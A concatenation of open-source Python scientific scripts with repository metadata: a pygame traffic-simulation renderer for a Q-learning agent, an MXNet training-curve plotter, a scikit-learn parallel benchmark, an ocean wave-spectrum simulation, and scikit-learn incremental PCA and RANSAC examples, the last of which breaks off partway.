                            elif event.type == self.pygame.KEYDOWN:
                                if event.key == 27:  # Esc
                                    self.quit = True
                                elif event.unicode == u' ':
                                    self.paused = True

                    if self.paused:
                        self.pause()

                    # Update environment
                    if self.current_time - self.last_updated >= self.update_delay:
                        self.env.step()
                        self.last_updated = self.current_time

                    # Render text
                    self.render_text(trial, testing)

                    # Render GUI and sleep
                    if self.display:
                        self.render(trial, testing)
                        self.pygame.time.wait(self.frame_delay)

                except KeyboardInterrupt:
                    self.quit = True
                finally:
                    if self.quit or self.env.done:
                        break

            if self.quit:
                break

            # Collect metrics from trial
            if self.log_metrics:
                self.log_writer.writerow({
                    'trial': trial,
                    'testing': self.env.trial_data['testing'],
                    'parameters': self.env.trial_data['parameters'],
                    'initial_deadline': self.env.trial_data['initial_deadline'],
                    'final_deadline': self.env.trial_data['final_deadline'],
                    'net_reward': self.env.trial_data['net_reward'],
                    'actions': self.env.trial_data['actions'],
                    'success': self.env.trial_data['success']
                })

            # Trial finished
            if self.env.success == True:
                print "\nTrial Completed!"
                print "Agent reached the destination."
            else:
                print "\nTrial Aborted!"
                print "Agent did not reach the destination."

            # Increment
            total_trials = total_trials + 1
            trial = trial + 1

        # Clean up: dump the learned Q-table (if any) and close log files.
        if self.log_metrics:
            if a.learning:
                f = self.table_file

                f.write("/-----------------------------------------\n")
                f.write("| State-action rewards from Q-Learning\n")
                f.write("\-----------------------------------------\n\n")

                for state in a.Q:
                    f.write("{}\n".format(state))
                    for action, reward in a.Q[state].iteritems():
                        f.write(" -- {} : {:.2f}\n".format(action, reward))
                    f.write("\n")
                self.table_file.close()

            self.log_file.close()

        print "\nSimulation ended. . . "

        # Report final metrics
        if self.display:
            self.pygame.display.quit()  # shut down pygame

    def render_text(self, trial, testing=False):
        """ This is the non-GUI render display of the simulation.
        Simulated trial data will be rendered in the terminal/command prompt. """

        status = self.env.step_data
        if status and status['waypoint'] is not None: # Continuing the trial

            # Previous State
            if status['state']:
                print "Agent previous state: {}".format(status['state'])
            else:
                print "!! Agent state not been updated!"

            # Result
            if status['violation'] == 0: # Legal
                if status['waypoint'] == status['action']: # Followed waypoint
                    print "Agent followed the waypoint {}. (rewarded {:.2f})".format(status['action'], status['reward'])
                elif status['action'] == None:
                    if status['light'] == 'red': # Stuck at red light
                        print "Agent properly idled at a red light. (rewarded {:.2f})".format(status['reward'])
                    else:
                        print "Agent idled at a green light with oncoming traffic. (rewarded {:.2f})".format(status['reward'])
                else: # Did not follow waypoint
                    print "Agent drove {} instead of {}. (rewarded {:.2f})".format(status['action'], status['waypoint'], status['reward'])
            else: # Illegal
                if status['violation'] == 1: # Minor violation
                    print "Agent idled at a green light with no oncoming traffic. (rewarded {:.2f})".format(status['reward'])
                elif status['violation'] == 2: # Major violation
                    print "Agent attempted driving {} through a red light. (rewarded {:.2f})".format(status['action'], status['reward'])
                elif status['violation'] == 3: # Minor accident
                    print "Agent attempted driving {} through traffic and cause a minor accident. (rewarded {:.2f})".format(status['action'], status['reward'])
                elif status['violation'] == 4: # Major accident
                    print "Agent attempted driving {} through a red light with traffic and cause a major accident. (rewarded {:.2f})".format(status['action'], status['reward'])

            # Time Remaining
            if self.env.enforce_deadline:
                # NOTE: this local 'time' shadows the imported time module for
                # the remainder of this call.
                time = (status['deadline'] - 1) * 100.0 / (status['t'] + status['deadline'])
                print "{:.0f}% of time remaining to reach destination.".format(time)
            else:
                print "Agent not enforced to meet deadline."

        # Starting new trial
        else:
            a = self.env.primary_agent
            print "Simulating trial. . . "
            if a.learning:
                print "epsilon = {:.4f}; alpha = {:.4f}".format(a.epsilon, a.alpha)
            else:
                print "Agent not set to learn."

    def render(self, trial, testing=False):
        """ This is the GUI render display of the simulation.
        Supplementary trial data can be found from render_text. """

        # Reset the screen.
        self.screen.fill(self.bg_color)

        # Draw elements
        # * Static elements

        # Boundary
        self.pygame.draw.rect(self.screen, self.boundary, ((self.env.bounds[0] - self.env.hang)*self.env.block_size, (self.env.bounds[1]-self.env.hang)*self.env.block_size, (self.env.bounds[2] + self.env.hang/3)*self.env.block_size, (self.env.bounds[3] - 1 + self.env.hang/3)*self.env.block_size), 4)

        for road in self.env.roads:
            # Road
            self.pygame.draw.line(self.screen, self.road_color, (road[0][0] * self.env.block_size, road[0][1] * self.env.block_size), (road[1][0] * self.env.block_size, road[1][1] * self.env.block_size), self.road_width)
            # Center line
            self.pygame.draw.line(self.screen, self.line_color, (road[0][0] * self.env.block_size, road[0][1] * self.env.block_size), (road[1][0] * self.env.block_size, road[1][1] * self.env.block_size), 2)

        # Intersections: traffic-light direction image plus red stop lines on
        # the closed approaches.
        for intersection, traffic_light in self.env.intersections.iteritems():
            self.pygame.draw.circle(self.screen, self.road_color, (intersection[0] * self.env.block_size, intersection[1] * self.env.block_size), self.road_width/2)
            if traffic_light.state: # North-South is open
                self.screen.blit(self._ns,
                    self.pygame.rect.Rect(intersection[0]*self.env.block_size - self.road_width/2, intersection[1]*self.env.block_size - self.road_width/2, intersection[0]*self.env.block_size + self.road_width, intersection[1]*self.env.block_size + self.road_width/2))
                self.pygame.draw.line(self.screen, self.stop_color, (intersection[0] * self.env.block_size - self.road_width/2, intersection[1] * self.env.block_size - self.road_width/2), (intersection[0] * self.env.block_size - self.road_width/2, intersection[1] * self.env.block_size + self.road_width/2), 2)
                self.pygame.draw.line(self.screen, self.stop_color, (intersection[0] * self.env.block_size + self.road_width/2 + 1, intersection[1] * self.env.block_size - self.road_width/2), (intersection[0] * self.env.block_size + self.road_width/2 + 1, intersection[1] * self.env.block_size + self.road_width/2), 2)
            else:
                self.screen.blit(self._ew,
                    self.pygame.rect.Rect(intersection[0]*self.env.block_size - self.road_width/2, intersection[1]*self.env.block_size - self.road_width/2, intersection[0]*self.env.block_size + self.road_width, intersection[1]*self.env.block_size + self.road_width/2))
                self.pygame.draw.line(self.screen, self.stop_color, (intersection[0] * self.env.block_size - self.road_width/2, intersection[1] * self.env.block_size - self.road_width/2), (intersection[0] * self.env.block_size + self.road_width/2, intersection[1] * self.env.block_size - self.road_width/2), 2)
                self.pygame.draw.line(self.screen, self.stop_color, (intersection[0] * self.env.block_size + self.road_width/2, intersection[1] * self.env.block_size + self.road_width/2 + 1), (intersection[0] * self.env.block_size - self.road_width/2, intersection[1] * self.env.block_size + self.road_width/2 + 1), 2)

        # * Dynamic elements
        self.font = self.pygame.font.Font(None, 20)
        for agent, state in self.env.agent_states.iteritems():
            # Compute precise agent location here (back from the intersection some)
            agent_offset = (2 * state['heading'][0] * self.agent_circle_radius + self.agent_circle_radius * state['heading'][1] * 0.5, \
                            2 * state['heading'][1] * self.agent_circle_radius - self.agent_circle_radius * state['heading'][0] * 0.5)
            agent_pos = (state['location'][0] * self.env.block_size - agent_offset[0], state['location'][1] * self.env.block_size - agent_offset[1])
            agent_color = self.colors[agent.color]

            if hasattr(agent, '_sprite') and agent._sprite is not None:
                # Draw agent sprite (image), properly rotated
                rotated_sprite = agent._sprite if state['heading'] == (1, 0) else self.pygame.transform.rotate(agent._sprite, 180 if state['heading'][0] == -1 else state['heading'][1] * -90)
                self.screen.blit(rotated_sprite,
                    self.pygame.rect.Rect(agent_pos[0] - agent._sprite_size[0] / 2, agent_pos[1] - agent._sprite_size[1] / 2,
                                          agent._sprite_size[0], agent._sprite_size[1]))
            else:
                # Draw simple agent (circle with a short line segment poking out to indicate heading)
                self.pygame.draw.circle(self.screen, agent_color, agent_pos, self.agent_circle_radius)
                self.pygame.draw.line(self.screen, agent_color, agent_pos, state['location'], self.road_width)

            if state['destination'] is not None:
                self.screen.blit(self._logo,
                    self.pygame.rect.Rect(state['destination'][0] * self.env.block_size - self.road_width/2, \
                                          state['destination'][1]*self.env.block_size - self.road_width/2, \
                                          state['destination'][0]*self.env.block_size + self.road_width/2, \
                                          state['destination'][1]*self.env.block_size + self.road_width/2))

        # * Overlays
        self.font = self.pygame.font.Font(None, 50)
        if testing:
            self.screen.blit(self.font.render("Testing Trial %s"%(trial), True, self.colors['black'], self.bg_color), (10, 10))
        else:
            self.screen.blit(self.font.render("Training Trial %s"%(trial), True, self.colors['black'], self.bg_color), (10, 10))

        self.font = self.pygame.font.Font(None, 30)

        # Status text about each step
        status = self.env.step_data
        if status:

            # Previous State
            if status['state']:
                self.screen.blit(self.font.render("Previous State: {}".format(status['state']), True, self.colors['white'], self.bg_color), (350, 10))
            if not status['state']:
                self.screen.blit(self.font.render("!! Agent state not updated!", True, self.colors['maroon'], self.bg_color), (350, 10))

            # Action
            if status['violation'] == 0: # Legal
                if status['action'] == None:
                    self.screen.blit(self.font.render("No action taken. (rewarded {:.2f})".format(status['reward']), True, self.colors['dgreen'], self.bg_color), (350, 40))
                else:
                    self.screen.blit(self.font.render("Agent drove {}. (rewarded {:.2f})".format(status['action'], status['reward']), True, self.colors['dgreen'], self.bg_color), (350, 40))
            else: # Illegal
                if status['action'] == None:
                    self.screen.blit(self.font.render("No action taken. (rewarded {:.2f})".format(status['reward']), True, self.colors['maroon'], self.bg_color), (350, 40))
                else:
                    self.screen.blit(self.font.render("{} attempted (rewarded {:.2f})".format(status['action'], status['reward']), True, self.colors['maroon'], self.bg_color), (350, 40))

            # Result
            if status['violation'] == 0: # Legal
                if status['waypoint'] == status['action']: # Followed waypoint
                    self.screen.blit(self.font.render("Agent followed the waypoint!", True, self.colors['dgreen'], self.bg_color), (350, 70))
                elif status['action'] == None:
                    if status['light'] == 'red': # Stuck at a red light
                        self.screen.blit(self.font.render("Agent idled at a red light!", True, self.colors['dgreen'], self.bg_color), (350, 70))
                    else:
                        self.screen.blit(self.font.render("Agent idled at a green light with oncoming traffic.", True, self.colors['mustard'], self.bg_color), (350, 70))
                else: # Did not follow waypoint
                    self.screen.blit(self.font.render("Agent did not follow the waypoint.", True, self.colors['mustard'], self.bg_color), (350, 70))
            else: # Illegal
                if status['violation'] == 1: # Minor violation
                    self.screen.blit(self.font.render("There was a green light with no oncoming traffic.", True, self.colors['maroon'], self.bg_color), (350, 70))
                elif status['violation'] == 2: # Major violation
                    self.screen.blit(self.font.render("There was a red light with no traffic.", True, self.colors['maroon'], self.bg_color), (350, 70))
                elif status['violation'] == 3: # Minor accident
                    self.screen.blit(self.font.render("There was traffic with right-of-way.", True, self.colors['maroon'], self.bg_color), (350, 70))
                elif status['violation'] == 4: # Major accident
                    self.screen.blit(self.font.render("There was a red light with traffic.", True, self.colors['maroon'], self.bg_color), (350, 70))

            # Time Remaining
            if self.env.enforce_deadline:
                # NOTE: this local 'time' shadows the imported time module for
                # the remainder of this call.
                time = (status['deadline'] - 1) * 100.0 / (status['t'] + status['deadline'])
                self.screen.blit(self.font.render("{:.0f}% of time remaining to reach destination.".format(time), True, self.colors['black'], self.bg_color), (350, 100))
            else:
                self.screen.blit(self.font.render("Agent not enforced to meet deadline.", True, self.colors['black'], self.bg_color), (350, 100))

            # Denote whether a trial was a success or failure
            # NOTE(review): 'state' here is the value left over from the agent
            # loop above (i.e. the last agent iterated) — looks accidental;
            # confirm it is meant to refer to the primary agent's state.
            if (state['destination'] != state['location'] and state['deadline'] > 0) or (self.env.enforce_deadline is not True and state['destination'] != state['location']):
                self.font = self.pygame.font.Font(None, 40)
                if self.env.success == True:
                    self.screen.blit(self.font.render("Previous Trial: Success", True, self.colors['dgreen'], self.bg_color), (10, 50))
                if self.env.success == False:
                    self.screen.blit(self.font.render("Previous Trial: Failure", True, self.colors['maroon'], self.bg_color), (10, 50))

                if self.env.primary_agent.learning:
                    self.font = self.pygame.font.Font(None, 22)
                    self.screen.blit(self.font.render("epsilon = {:.4f}".format(self.env.primary_agent.epsilon), True, self.colors['black'], self.bg_color), (10, 80))
                    self.screen.blit(self.font.render("alpha = {:.4f}".format(self.env.primary_agent.alpha), True, self.colors['black'], self.bg_color), (10, 95))

        # Reset status text
        else:
            self.pygame.rect.Rect(350, 10, self.width, 200)
            self.font = self.pygame.font.Font(None, 40)
            self.screen.blit(self.font.render("Simulating trial. . .", True, self.colors['white'], self.bg_color), (400, 60))

        # Flip buffers
        self.pygame.display.flip()

    def pause(self):
        """ When the GUI is enabled, this function will pause the simulation. """

        abs_pause_time = time.time()
        self.font = self.pygame.font.Font(None, 30)
        pause_text = "Simulation Paused. Press any key to continue. . ."
        self.screen.blit(self.font.render(pause_text, True, self.colors['red'], self.bg_color), (400, self.height - 30))
        self.pygame.display.flip()
        print pause_text

        # Busy-wait (with frame delay) until any key is pressed.
        while self.paused:
            for event in self.pygame.event.get():
                if event.type == self.pygame.KEYDOWN:
                    self.paused = False
            self.pygame.time.wait(self.frame_delay)
        # Erase the pause message and exclude the paused interval from the
        # trial's elapsed time.
        self.screen.blit(self.font.render(pause_text, True, self.bg_color, self.bg_color), (400, self.height - 30))
        self.start_time += (time.time() - abs_pause_time)
| bsd-3-clause |
jennyzhang0215/incubator-mxnet | example/kaggle-ndsb1/training_curves.py | 52 | 1879 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
## based on https://github.com/dmlc/mxnet/issues/1302
## Parses the model fit log file and generates a train/val vs epoch plot
import matplotlib.pyplot as plt
import numpy as np
import re
import argparse
# Parse command-line options: --log-file points at the training log to plot.
parser = argparse.ArgumentParser(description='Parses log file and generates train/val curves')
parser.add_argument('--log-file', type=str, default="log_tr_va",
                    help='the path of log file')
args = parser.parse_args()

# Raw strings so the regex escapes (\s, \d, \.) reach the re engine verbatim;
# the original plain strings trigger invalid-escape warnings on Python 3.6+.
TR_RE = re.compile(r'.*?]\sTrain-accuracy=([\d\.]+)')
VA_RE = re.compile(r'.*?]\sValidation-accuracy=([\d\.]+)')

# Read the whole log once; the context manager closes the handle promptly
# (the original leaked the file object).
with open(args.log_file) as log_file:
    log = log_file.read()

# One accuracy value per epoch, in file order.
log_tr = [float(x) for x in TR_RE.findall(log)]
log_va = [float(x) for x in VA_RE.findall(log)]
idx = np.arange(len(log_tr))

plt.figure(figsize=(8, 6))
plt.xlabel("Epoch")
plt.ylabel("Accuracy")
plt.plot(idx, log_tr, 'o', linestyle='-', color="r",
         label="Train accuracy")
plt.plot(idx, log_va, 'o', linestyle='-', color="b",
         label="Validation accuracy")
plt.legend(loc="best")
plt.xticks(np.arange(min(idx), max(idx)+1, 5))
plt.yticks(np.arange(0, 1, 0.2))
plt.ylim([0,1])
plt.show()
| apache-2.0 |
ilo10/scikit-learn | benchmarks/bench_plot_parallel_pairwise.py | 297 | 1247 | # Author: Mathieu Blondel <mathieu@mblondel.org>
# License: BSD 3 clause
import time
import pylab as pl
from sklearn.utils import check_random_state
from sklearn.metrics.pairwise import pairwise_distances
from sklearn.metrics.pairwise import pairwise_kernels
def plot(func):
    """Time *func* on growing inputs with one core vs. all cores and plot both curves.

    ``func`` must accept ``(X, n_jobs)``; timings are wall-clock seconds per call.
    """
    rng = check_random_state(0)
    sample_sizes = range(1000, 6000, 1000)
    serial_times, parallel_times = [], []

    for n_samples in sample_sizes:
        X = rng.rand(n_samples, 300)
        # Run the single-core and multi-core variants back-to-back on the
        # same matrix so the comparison is apples-to-apples.
        for n_jobs, timings in ((1, serial_times), (-1, parallel_times)):
            tic = time.time()
            func(X, n_jobs=n_jobs)
            timings.append(time.time() - tic)

    pl.figure('scikit-learn parallel %s benchmark results' % func.__name__)
    pl.plot(sample_sizes, serial_times, label="one core")
    pl.plot(sample_sizes, parallel_times, label="multi core")
    pl.xlabel('n_samples')
    pl.ylabel('Time (s)')
    pl.title('Parallel %s' % func.__name__)
    pl.legend()
def euclidean_distances(X, n_jobs):
    """Benchmark target: full pairwise Euclidean distance matrix of X."""
    return pairwise_distances(X, metric="euclidean", n_jobs=n_jobs)
def rbf_kernels(X, n_jobs):
    """Benchmark target: full pairwise RBF kernel matrix of X (gamma=0.1)."""
    return pairwise_kernels(X, metric="rbf", n_jobs=n_jobs, gamma=0.1)
# Run both benchmarks, then display the two timing figures.
plot(euclidean_distances)
plot(rbf_kernels)
pl.show()
| bsd-3-clause |
pakodekker/oceansar | misc/dressed_spectrum_v2.py | 1 | 8434 | """
WAVESIM Test - Maria 2014
Testing program to obtain the dressed spectrum of Choppy waves,
in comparsion with the theoretical linear one.
The number of realizations can be selected
"""
import numpy as np
from scipy import linalg
from trampa import utils
from oceansar import spec
from oceansar import spread
import matplotlib.pyplot as plt
from matplotlib import mlab
from matplotlib import cm
from matplotlib.colors import LogNorm
# Step 1: Create ocean surface
# Selected parameters
# Lx: surface X dimension [m]
Lx = 512.
# Ly: surface Y dimension [m]
Ly = 512.
# dx: surface X resolution [m]
dx = 0.5
# dy: surface Y resolution [m]
dy = 0.5
# spec_model: omnidirectional spectrum model
spec_model = 'elfouhaily'
# spread_model: spreading function model
spread_model = 'elfouhaily'
# wind_dir: wind direction (rad)
wind_dir = np.deg2rad(45.)
# wind_fetch: wind fetch (m)
wind_fetch = 500.e3
# wind_U: wind speed (m/s)
wind_U = 11.
# current_mag: current magnitude (m/s, presumably -- TODO confirm units)
current_mag = 0.
# current_dir: current direction (rad)
current_dir = np.deg2rad(0.)
# fft_max_prime: maximum prime factor allowed in matrix sizes
fft_max_prime = 3
# zp_value: factor for zero-padding
zp_value = 4
# Niter: number of realizations to average over
Niter = 10
# Grid dimensions - optimized to FFT-friendly sizes (small prime factors)
# NOTE(review): np.int/np.float are removed in modern NumPy -- use int/float.
Nx = np.int(Lx/dx)
Ny = np.int(Ly/dy)
Nx = utils.optimize_fftsize(Nx, fft_max_prime)
Ny = utils.optimize_fftsize(Ny, fft_max_prime)
# Recompute the resolutions so Lx = Nx*dx holds exactly after rounding.
dx = Lx/np.float(Nx)
dy = Ly/np.float(Ny)
# X-Y vector - linspace can be problematic, refinement with arange
x = np.linspace(-Lx/2., Lx/2., Nx)
x = (np.arange(x.size) - x.size/2) * (x[1]-x[0])
y = np.linspace(-Ly/2., Ly/2., Ny)
y = (np.arange(y.size) - y.size/2) * (y[1]-y[0])
x, y = np.meshgrid(x, y)
# Currents: the effective wind is the wind vector minus the surface current.
current = current_mag * np.array([np.cos(current_dir), np.sin(current_dir)])
U_eff_vec = (wind_U * np.array([np.cos(wind_dir), np.sin(wind_dir)]) - current)
wind_U_eff = linalg.norm(U_eff_vec)
wind_dir_eff = np.arctan2(U_eff_vec[1], U_eff_vec[0])
# Kx-Ky meshgrid (angular wavenumbers, FFT ordering)
kx = 2.*np.pi*np.fft.fftfreq(Nx, dx)
ky = 2.*np.pi*np.fft.fftfreq(Ny, dy)
kx, ky = np.meshgrid(kx, ky)
# Kx-Ky resolution
kx_res = kx[0, 1] - kx[0, 0]
ky_res = ky[1, 0] - ky[0, 0]
# K-theta meshgrid (Polar, wind direction shifted)
# good_k masks out k ~ 0 to avoid dividing by zero below.
k = np.sqrt(kx**2 + ky**2)
good_k = np.where(k > np.min(np.array([kx_res, ky_res]))/2.0)
kinv = np.zeros(k.shape)
kinv[good_k] = 1./k[good_k]
theta = np.angle(np.exp(1j * (np.arctan2(ky, kx) - wind_dir_eff)))
# Compute directional wave spectrum (1/k*S(k)*D(k,theta))
wave_spec = np.zeros(k.shape)
wave_spec[good_k] = spec.models[spec_model](k[good_k], wind_U_eff, wind_fetch)
wave_spread = np.zeros(k.shape)
wave_spread[good_k] = spread.models[spread_model](k[good_k], theta[good_k],
                                                  wind_U_eff, wind_fetch)
wave_dirspec = kinv*wave_spec*wave_spread
# Spectrum with zero padding (embed in a zp_value-times larger array).
# NOTE(review): -Nx/2 / -Ny/2 assume Python 2 integer division; under
# Python 3 these become floats and np.roll would fail -- use // there.
wave_dirspec = np.fft.fftshift(wave_dirspec)
wave_dirspec_zp = np.zeros([zp_value*Ny,zp_value*Nx])
wave_dirspec_zp[0:Ny,0:Nx] = wave_dirspec
wave_dirspec = np.roll(np.roll(wave_dirspec, -Nx/2, axis=1), -Ny/2, axis=0)
wave_dirspec_zp = np.roll(np.roll(wave_dirspec_zp, -Nx/2, axis=1), -Ny/2, axis=0)
# new x-y grids at the zero-padded (finer) sampling
x_new = np.linspace(-Lx/2., Lx/2., zp_value*Nx)
y_new = np.linspace(-Ly/2., Ly/2., zp_value*Ny)
x_new, y_new = np.meshgrid(x_new, y_new)
# new Kx-Ky
kx_new = 2.*np.pi*np.fft.fftfreq(zp_value*Nx, dx/zp_value)
ky_new = 2.*np.pi*np.fft.fftfreq(zp_value*Ny, dy/zp_value)
kx_new, ky_new = np.meshgrid(kx_new, ky_new)
# new x-y resolution
x_res = x_new[0, 1] - x_new[0, 0]
y_res = y_new[1, 0] - y_new[0, 0]
# new Kx-Ky resolution - same as before (padding extends coverage, not step)
kx_res_new = kx_new[0, 1] - kx_new[0, 0]
ky_res_new = ky_new[1, 0] - ky_new[0, 0]
# new K-theta meshgrid (Polar, wind direction shifted)
k_new = np.sqrt(kx_new**2 + ky_new**2)
good_k_new = np.where(k_new > np.min(np.array([kx_res_new, ky_res_new]))/2.0)
kinv_new = np.zeros(k_new.shape)
kinv_new[good_k_new] = 1./k_new[good_k_new]
theta_new = np.angle(np.exp(1j * (np.arctan2(ky_new, kx_new) - wind_dir_eff)))
# One dressed spectrum per Monte Carlo realization, averaged afterwards.
wave_spectrum_vect = np.zeros([Ny,Nx,Niter])
for nnn in range (Niter):
    # Complex Gaussian to randomize spectrum coefficients
    random_cg = 1./np.sqrt(2.)*(np.random.normal(0., 1., size=[zp_value*Ny, zp_value*Nx]) +
                                1j*np.random.normal(0., 1., size=[zp_value*Ny, zp_value*Nx]))
    # Initialize coefficients
    wave_coefs = zp_value**2*Nx*Ny*np.sqrt(2.*wave_dirspec_zp*kx_res_new*ky_res_new)*random_cg
    # HORIZ. DISPL. & HEIGHT FIELD (Dx, Dy, Dz)
    Dx = np.real(np.fft.ifft2(1j*kx_new*kinv_new*wave_coefs))
    Dy = np.real(np.fft.ifft2(1j*ky_new*kinv_new*wave_coefs))
    Dz = np.real(np.fft.ifft2(wave_coefs))
    #print 'The mean and variance of Dz are: ', np.mean(Dz), np.var(Dz)
    # Step 2: Obtain the real choppy surface
    # Irregular x-y grid (horizontal displacements make the grid non-uniform)
    x_irr, y_irr = (x_new + Dx, y_new + Dy)
    # Interpolate using Delaunay triangularizations to the regular grid
    # NOTE(review): mlab.griddata was removed from matplotlib long ago;
    # scipy.interpolate.griddata is the modern replacement.
    z = mlab.griddata(x_irr.flatten(), y_irr.flatten(), Dz.flatten(), x, y, interp='linear')
    # Remove possible 'masked' values
    z = np.where(z.mask == True, 0.0, z)
    # Create a 2-D Hanning window to reduce spectral leakage
    win_x = np.hanning(Nx)
    win_y = np.hanning(Ny)
    win_2D = np.sqrt(np.outer(win_y,win_x))
    # Insert the window to the surface
    z_new = z * win_2D
    # New wave directional spectrum (wave_spectrum=smooth(abs(2*fft(Dz))^2))
    # Notice that factor 2 is for the amplitude correction due to Hanning window
    wave_spectrum = utils.smooth((np.abs(np.fft.fftshift(2.*np.fft.fft2(z_new))))**2., window_len=3)
    wave_spectrum = np.roll(np.roll(wave_spectrum, -Nx/2, axis=0), -Ny/2, axis=1)
    # Normalization of the spectrum (opposite to the theoretical case)
    wave_spectrum = (2.*wave_spectrum)/((Nx*Ny)**2*(kx_res*ky_res))
    wave_spectrum_vect[:,:,nnn] = wave_spectrum
# Averaging of the different realizations
wave_spectrum = np.zeros([Ny,Nx])
wave_spectrum = np.sum(wave_spectrum_vect, axis=2)/Niter
# Save memory!
wave_spectrum_vect = 0.0
# Only waves travelling in one main direction: half spectrum - factor of 2
wave_dirspec2 = np.zeros(k.shape)
wave_dirspec2[good_k] = wave_spectrum[good_k]
wave_dirspec2 = np.where((theta > -np.pi/2.) & (theta < np.pi/2.),
                         wave_dirspec2, 0)
# Step 3: Plots for the comparison of dressed and undressed spectra
# 2-D maps (log colour scale), then 1-D cuts along three directions.
plt.figure()
plt.imshow(np.fft.fftshift(wave_dirspec), origin='lower', cmap=cm.jet,
           norm=LogNorm(vmin=1.e-5, vmax=1.e2))
plt.colorbar()
plt.title('[Original] Undressed spectrum')
plt.show()
#plt.figure()
#plt.imshow(np.fft.fftshift(wave_dirspec_zp), origin='lower', cmap=cm.jet,
#           norm=LogNorm(vmin=1.e-5, vmax=1.e2))
#plt.colorbar()
#plt.title('[0-Padding] Undressed spectrum')
#plt.show()
plt.figure()
plt.imshow(np.fft.fftshift(wave_dirspec2), origin='lower', cmap=cm.jet,
           norm=LogNorm(vmin=1.e-5, vmax=1.e2))
plt.colorbar()
plt.title('Dressed spectrum')
plt.show()
# Diagonal cut (theta = pi/4).  NOTE(review): Ny/2 and Nx/2 slices assume
# Python 2 integer division; use // under Python 3.
plt.figure()
plt.loglog(np.diag(k[0:Ny/2,0:Nx/2]), np.diag(wave_dirspec[0:Ny/2,0:Nx/2]),
           color='red', label='Undressed')
plt.loglog(np.diag(k[0:Ny/2,0:Nx/2]), np.diag(wave_dirspec2[0:Ny/2,0:Nx/2]),
           color='blue', label='Dressed')
v = [1.e-2, 1.e2, 1.e-8, 1.e2]
plt.axis(v)
plt.title('Diagonal with '+r'$\theta=\pi/4$'+' (rad)')
plt.xlabel('Wave number '+r'$k$' + ' (rad/m)')
plt.ylabel('Wave directional spectrum '+r'$\Phi(k)$')
plt.grid(True)
plt.legend(loc='best')
plt.show()
# Horizontal cut (row 1)
plt.figure()
plt.loglog(k[1,0:Nx/2], wave_dirspec[1,0:Nx/2], color='red', label='Undressed')
plt.loglog(k[1,0:Nx/2], wave_dirspec2[1,0:Nx/2], color='blue', label='Dressed')
v = [1.e-2, 1.e2, 1.e-8, 1.e2]
plt.axis(v)
plt.title('Horizontal with '+r'$\theta=\pi/4$'+' (rad)')
plt.xlabel('Wave number '+r'$k$' + ' (rad/m)')
plt.ylabel('Wave directional spectrum '+r'$\Phi(k)$')
plt.grid(True)
plt.legend(loc='best')
plt.show()
# Vertical cut (column 1)
plt.figure()
plt.loglog(k[0:Ny/2,1], wave_dirspec[0:Ny/2,1], color='red', label='Undressed')
plt.loglog(k[0:Ny/2,1], wave_dirspec2[0:Ny/2,1], color='blue', label='Dressed')
v = [1.e-2, 1.e2, 1.e-8, 1.e2]
plt.axis(v)
plt.title('Vertical with '+r'$\theta=\pi/4$'+' (rad)')
plt.xlabel('Wave number '+r'$k$' + ' (rad/m)')
plt.ylabel('Wave directional spectrum '+r'$\Phi(k)$')
plt.grid(True)
plt.legend(loc='best')
plt.show()
| gpl-3.0 |
kaichogami/scikit-learn | examples/decomposition/plot_incremental_pca.py | 175 | 1974 | """
===============
Incremental PCA
===============
Incremental principal component analysis (IPCA) is typically used as a
replacement for principal component analysis (PCA) when the dataset to be
decomposed is too large to fit in memory. IPCA builds a low-rank approximation
for the input data using an amount of memory which is independent of the
number of input data samples. It is still dependent on the input data features,
but changing the batch size allows for control of memory usage.
This example serves as a visual check that IPCA is able to find a similar
projection of the data to PCA (to a sign flip), while only processing a
few samples at a time. This can be considered a "toy example", as IPCA is
intended for large datasets which do not fit in main memory, requiring
incremental approaches.
"""
print(__doc__)
# Authors: Kyle Kastner
# License: BSD 3 clause
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import load_iris
from sklearn.decomposition import PCA, IncrementalPCA
iris = load_iris()
X = iris.data
y = iris.target
# Fit both estimators with the same number of components so their
# projections are directly comparable (up to sign flips).
n_components = 2
ipca = IncrementalPCA(n_components=n_components, batch_size=10)
X_ipca = ipca.fit_transform(X)
pca = PCA(n_components=n_components)
X_pca = pca.fit_transform(X)
colors = ['navy', 'turquoise', 'darkorange']
for X_transformed, title in [(X_ipca, "Incremental PCA"), (X_pca, "PCA")]:
    plt.figure(figsize=(8, 8))
    for color, i, target_name in zip(colors, [0, 1, 2], iris.target_names):
        plt.scatter(X_transformed[y == i, 0], X_transformed[y == i, 1],
                    color=color, lw=2, label=target_name)
    if "Incremental" in title:
        # abs() on both sides makes the error invariant to component sign.
        err = np.abs(np.abs(X_pca) - np.abs(X_ipca)).mean()
        plt.title(title + " of iris dataset\nMean absolute unsigned error "
                  "%.6f" % err)
    else:
        plt.title(title + " of iris dataset")
    plt.legend(loc="best", shadow=False, scatterpoints=1)
    plt.axis([-4, 4, -1.5, 1.5])
plt.show()
| bsd-3-clause |
loli/sklearn-ensembletrees | examples/linear_model/plot_ransac.py | 250 | 1673 | """
===========================================
Robust linear model estimation using RANSAC
===========================================
In this example we see how to robustly fit a linear model to faulty data using
the RANSAC algorithm.
"""
import numpy as np
from matplotlib import pyplot as plt
from sklearn import linear_model, datasets
n_samples = 1000
n_outliers = 50
X, y, coef = datasets.make_regression(n_samples=n_samples, n_features=1,
                                      n_informative=1, noise=10,
                                      coef=True, random_state=0)
# Add outlier data: overwrite the first n_outliers samples with points far
# from the true line so the ordinary fit is pulled off course.
np.random.seed(0)
X[:n_outliers] = 3 + 0.5 * np.random.normal(size=(n_outliers, 1))
y[:n_outliers] = -3 + 10 * np.random.normal(size=n_outliers)
# Fit line using all data
model = linear_model.LinearRegression()
model.fit(X, y)
# Robustly fit linear model with RANSAC algorithm
model_ransac = linear_model.RANSACRegressor(linear_model.LinearRegression())
model_ransac.fit(X, y)
inlier_mask = model_ransac.inlier_mask_
outlier_mask = np.logical_not(inlier_mask)
# Predict data of estimated models over a fixed x-range for plotting.
line_X = np.arange(-5, 5)
line_y = model.predict(line_X[:, np.newaxis])
line_y_ransac = model_ransac.predict(line_X[:, np.newaxis])
# Compare estimated coefficients
